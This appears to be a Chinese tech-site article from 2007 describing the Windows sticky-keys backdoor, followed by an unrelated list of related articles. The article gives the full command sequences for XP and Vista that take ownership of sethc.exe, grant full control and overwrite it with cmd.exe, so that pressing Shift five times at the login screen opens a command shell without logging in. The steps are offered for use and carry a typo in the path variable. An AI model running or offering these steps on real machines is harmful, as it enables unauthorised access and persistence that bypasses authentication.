快捷導(dǎo)航

WINDOWS漏洞：粘置鍵

更新時(shí)間：2007年04月23日 00:00:00 作者：

在windows 2000/xp/vista下，按shift鍵5次，可以打開粘置，會運(yùn)行sethc.exe，而且，在登錄界面里也可以打開。這就讓人聯(lián)想到WINDOWS的屏保，將程序替換成cmd.exe后，就可以打開shell了。

參考McafeeAvertLabs：
http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/

XP：
將安裝源光盤彈出（或?qū)⒂脖P上的安裝目錄改名)
cd %widnir%\system32\dllcache
ren sethc.exe *.ex~
cd %widnir%\system32
copy /y cmd.exe sethc.exe

VISTA：
takeown /f c:\windows\system32\sethc.exe
cacls c:\windows\system32\sethc.exe /G administrator:F
然后按XP方法替換文件

在登錄界面按5此SHIFT，出來cmd shell，然后……

WINDOWS漏洞：粘置鍵

相關(guān)文章

輸入gpedit.msc后提示找不到gpedit.msc的解決方法
在“運(yùn)行”對話框中輸入“gpedit.msc ”后，Windows 卻提示“找不到該文件，無法運(yùn)行”。
2007-05-05
使用Google工具欄追蹤 Blog 留言
每個(gè)開 Blog 的兄弟都會時(shí)刻關(guān)注 Blog 上的留言，上次已經(jīng)說道如何使用 Gtalk 追蹤網(wǎng)站的留言。在使用 Google 工具條時(shí)發(fā)現(xiàn)其實(shí) Google 工具條本身也開放了 API 供用戶調(diào)用。第一步要做的就是將用戶留言做成 RSS 格式的輸出（其實(shí)也就是 XML 格式，Wordpress 已經(jīng)有這樣的功能了）。
2008-04-04
ghost.pif新變種導(dǎo)致殺毒軟件0xc00000ba失敗的解決方法
ghost.pif新變種導(dǎo)致殺毒軟件0xc00000ba失敗的解決方法...
2007-07-07
非常完整全面的藍(lán)屏代碼解讀
非常完整全面的藍(lán)屏代碼解讀...
2007-02-02
PuTTY登錄設(shè)置的批量備份導(dǎo)出/導(dǎo)入
Putty是最常用的遠(yuǎn)程登錄工具和加密代理訪問工具等，管理很多臺服務(wù)器的時(shí)就有很多登錄配置，當(dāng)換機(jī)器的時(shí)候就成了一個(gè)問題。
2008-04-04
讓你的ewbeditor也能運(yùn)行代碼
下面的方法不太好，本站用的是[html]運(yùn)行的內(nèi)容[/html]就可以實(shí)現(xiàn)運(yùn)行效果代碼
2008-01-01
用nero刻錄可啟動功能的光盤而且光盤不是iso格式的
用nero刻錄可啟動功能的光盤而且光盤不是iso格式的...
2007-12-12
IE8引發(fā) VS2005/2008 MFC向?qū)С鲥e(cuò)的解決方案
IE正式版引發(fā)VS2005和VS2008向?qū)С鲥e(cuò)的解決方案.這個(gè)是VC++團(tuán)隊(duì)給出的.
2009-04-04
女生領(lǐng)巾絲巾的打法圖示教程
女士絲巾的打法圖文示例
2008-04-04
Vmware虛擬機(jī)的安裝及配置方法
Vmware虛擬機(jī)的安裝及配置方法...
2007-11-11